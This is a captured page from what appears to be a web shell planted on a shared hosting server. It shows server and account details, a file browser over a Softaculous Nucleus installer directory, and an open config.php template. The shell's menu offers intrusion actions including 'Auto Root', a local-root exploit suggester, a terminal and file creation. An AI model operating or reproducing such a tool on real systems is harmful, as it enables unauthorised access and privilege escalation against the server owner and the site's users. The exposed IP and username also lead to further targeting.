Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
nucleus /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-05-03 12:53
php53
[ DIR ]
drwxr-xr-x
2024-05-03 12:53
php56
[ DIR ]
drwxr-xr-x
2024-05-03 12:53
php71
[ DIR ]
drwxr-xr-x
2024-05-03 12:53
php81
[ DIR ]
drwxr-xr-x
2024-05-03 12:53
php82
[ DIR ]
drwxr-xr-x
2024-05-03 12:53
Notes.txt
188
B
-rw-r--r--
2021-12-23 00:54
clone.php
3.15
KB
-rw-r--r--
2024-05-02 02:13
config.php
1009
B
-rw-r--r--
2021-12-23 00:54
edit.php
4.39
KB
-rw-r--r--
2024-05-02 02:13
edit.xml
433
B
-rw-r--r--
2021-12-23 00:54
fileindex.php
250
B
-rw-r--r--
2021-12-23 00:54
import.php
3.27
KB
-rw-r--r--
2024-05-02 02:13
info.xml
2.05
KB
-rw-r--r--
2024-05-02 00:25
install.js
921
B
-rw-r--r--
2021-12-23 00:54
install.php
3.49
KB
-rw-r--r--
2024-05-02 02:13
install.xml
1.39
KB
-rw-r--r--
2021-12-23 00:54
md5
2.2
KB
-rw-r--r--
2024-05-02 02:13
nucleus.sql
31.68
KB
-rw-r--r--
2024-05-03 12:53
nucleus.zip
1
MB
-rw-r--r--
2024-05-03 12:53
upgrade.php
2.42
KB
-rw-r--r--
2024-05-02 02:13
upgrade.xml
375
B
-rw-r--r--
2021-12-23 00:54
Save
Rename
<?php // mySQL connection information $MYSQL_HOST = '[[softdbhost]]'; $MYSQL_USER = '[[softdbuser]]'; $MYSQL_PASSWORD = '[[softdbpass]]'; $MYSQL_DATABASE = '[[softdb]]'; $MYSQL_PREFIX = '[[dbprefix]]'; // new in 3.50. first element is db handler, the second is the db driver used by the handler // default is $MYSQL_HANDLER = array('mysql','mysql'); //$MYSQL_HANDLER = array('mysql','mysql'); //$MYSQL_HANDLER = array('pdo','mysql'); $MYSQL_HANDLER = array('mysql',''); // main nucleus directory $DIR_NUCLEUS = '[[softpath]]/nucleus/'; // path to media dir $DIR_MEDIA = '[[softpath]]/media/'; // extra skin files for imported skins $DIR_SKINS = '[[softpath]]/skins/'; // these dirs are normally sub dirs of the nucleus dir, but // you can redefine them if you wish $DIR_PLUGINS = $DIR_NUCLEUS . 'plugins/'; $DIR_LANG = $DIR_NUCLEUS . 'language/'; $DIR_LIBS = $DIR_NUCLEUS . 'libs/'; // include libs include($DIR_LIBS.'globalfunctions.php'); $CONF['alertOnSecurityRisk'] = 0; ?>